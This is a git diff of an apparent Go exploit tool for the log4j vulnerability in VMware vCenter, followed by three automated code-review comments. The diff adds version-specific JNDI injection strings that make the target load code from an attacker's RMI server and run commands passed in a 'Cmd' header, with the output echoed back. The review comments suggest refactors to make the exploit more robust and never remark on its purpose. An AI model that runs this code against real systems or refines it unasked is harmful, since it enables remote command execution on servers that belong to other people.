diff --git a/README.md b/README.md
index 493acbe..a776fd6 100644
--- a/README.md
+++ b/README.md
@@ -71,6 +71,7 @@ V1.2 增加了针对Vcenter的log4j检测和验证能力
 V1.3 增加了对Vmware WorkSpace One Access的漏洞验证功能,包括CVE-2022-22954 远程命令执行;CVE-2022-22972、CVE-2022-31656身份鉴别绕过
 V1.3.1 修复了检测log4j时忽略了端口的问题,有的服务会更改默认的443端口
 V1.3.2 修改了针对log4j的利用方式,通过tomcatbypassEcho的方式执行命令并获取回显。vcenter 7.0 linux测试通过。
+V1.3.3 增加了对6.7和7.0版本的区别利用,7.0必须使用tomcatbypass,而6.7使用普通的basic就行了
 ...
 ```
 
diff --git a/go.mod b/go.mod
index 27d6150..8599d87 100644
--- a/go.mod
+++ b/go.mod
@@ -3,6 +3,7 @@ module GO_VCENTER
 go 1.18
 
 require (
+	github.com/beevik/etree v1.1.0 // indirect
 	github.com/buger/jsonparser v1.1.1 // indirect
 	github.com/cheekybits/genny v1.0.0 // indirect
 	github.com/fatih/color v1.13.0 // indirect
diff --git a/go.sum b/go.sum
index ff0ee49..d83b970 100644
--- a/go.sum
+++ b/go.sum
@@ -9,6 +9,8 @@ dmitri.shuralyov.com/state v0.0.0-20180228185332-28bcc343414c/go.mod h1:0PRwlb0D
 git.apache.org/thrift.git v0.0.0-20180902110319-2566ecd5d999/go.mod h1:fPE2ZNJGynbRyZ4dJvy6G277gSllfV2HJqblrnkyeyg=
 github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU=
 github.com/anmitsu/go-shlex v0.0.0-20161002113705-648efa622239/go.mod h1:2FmKhYUyUczH0OGQWaF5ceTx0UBShxjsH6f8oGKYe2c=
+github.com/beevik/etree v1.1.0 h1:T0xke/WvNtMoCqgzPhkX2r4rjY3GDZFi+FjpRZY2Jbs=
+github.com/beevik/etree v1.1.0/go.mod h1:r8Aw8JqVegEf0w2fDnATrX9VpkMcyFeM0FhwO62wh+A=
 github.com/beorn7/perks v0.0.0-20180321164747-3a771d992973/go.mod h1:Dwedo/Wpr24TaqPxmxbtue+5NUziq4I4S80YR8gNf3Q=
 github.com/bradfitz/go-smtpd v0.0.0-20170404230938-deb6d6237625/go.mod h1:HYsPBTaaSFSlLx/70C2HPIMNZpVV8+vt/A+FMnYP11g=
 github.com/buger/jsonparser v0.0.0-20181115193947-bf1c66bbce23/go.mod h1:bbYlZJ7hK1yFx9hf58LP0zeX7UjIGs20ufpu3evjr+s=
diff --git a/main.go b/main.go
index c0b1a76..d56c5ee 100644
--- a/main.go
+++ b/main.go
@@ -117,7 +117,14 @@ func main() { usage() os.Exit(0) } else { - log4jcenter.Exec_cmd(url, rmi, command) + if log4jcenter.Exec_cmd(url, rmi, command, "6") { + // + } else { + fmt.Println("[-] Vcenter 6.X paylaod 利用失败,尝试7.0") + if !log4jcenter.Exec_cmd(url, rmi, command, "7") { + fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因.") + } + } } } else { diff --git a/src/log4jcenter/log4j.go b/src/log4jcenter/log4j.go index 5a73f8e..2b8a47a 100644 --- a/src/log4jcenter/log4j.go +++ b/src/log4jcenter/log4j.go @@ -127,14 +127,23 @@ func exploit(url, rmiserver string) { } -func Exec_cmd(url, rmiserver, command string) { +func Exec_cmd(url, rmiserver, command, version string) bool { host := rmiserver client := req.C() client.EnableForceHTTP1() client.EnableInsecureSkipVerify() client.SetTimeout(2 * time.Second) // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403 - rmi_server := fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host) + rmi_server := "" + cmd := "" + if version == "6" { + rmi_server = fmt.Sprintf("${jndi:%s/Basic/TomcatEcho}", host) + cmd = command + " && echo nmsl" + } else { + rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host) + cmd = command + ";echo 'nmsl'" + } + myheader := map[string]string{ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", @@ -145,7 +154,7 @@ func Exec_cmd(url, rmiserver, command string) { "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1", - "Cmd": command + ";echo 'nmsl'", + "Cmd": cmd, } resp, err := client.R(). @@ -166,8 +175,10 @@ func Exec_cmd(url, rmiserver, command string) { result = strings.Split(result, "nmsl")[0] result = strings.TrimRight(result, "\n") fmt.Println(result) + return true } else { - fmt.Println("[-] 回显失败,目标不存在漏洞或其他原因.") + + return false } }
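Review bot: The new `if log4jcenter.Exec_cmd(url, rmi, command, "6") { // } else { … }` in main.go has an empty then-block holding nothing but a bare `//`; inverting the condition removes the dead branch and a level of nesting: `if !log4jcenter.Exec_cmd(url, rmi, command, "6") { fmt.Println(...); if !log4jcenter.Exec_cmd(url, rmi, command, "7") { fmt.Println(...) } }`. The version selector is passed as the bare literals "6" and "7" at two call sites while the README entry in this commit talks about 6.7 and 7.0; exported constants in log4jcenter (for example `const Version6 = "6"`) would keep caller and callee from drifting. The user-facing string also has a typo, `paylaod` → `payload`. The body of main begins and ends outside this hunk.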
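Review bot: In the first log4j.go hunk, `version` is compared only against the literal "6", so every other value — "7", "6.7", an empty string or a typo — silently takes the else path, and a caller mistake is indistinguishable from an intended 7.0 run. A `switch version { case "6": … case "7": … default: return false }` (or an error return) would make the accepted values explicit and fail closed on anything else. The exported function still has no doc comment, and `Exec_cmd` is not idiomatic Go naming (`ExecCmd`), though renaming changes the package API; at minimum add a comment starting with the function name that states which `version` values are accepted and that the bool is true only when the expected response was observed. The `else` branch of the new version check reads as the default for all unrecognized input, which should be stated in that comment if it is intentional. Exec_cmd continues past the end of this hunk.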
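Review bot: In the last log4j.go hunk the `else` branch now consists of an added blank line followed by `return false`; because the `if` branch ends in `return true`, the `else` is redundant and the happy path can be left-aligned by closing the `if` after `return true` and making `return false` the function's final statement, dropping the stray empty `+` line. Removing the `fmt.Println("[-] 回显失败…")` here also means the function is now silent on failure and relies on the caller in main.go to report it; that contract belongs in the function's doc comment so other callers do not assume an error is printed. The `if` this `else` belongs to opens outside this hunk.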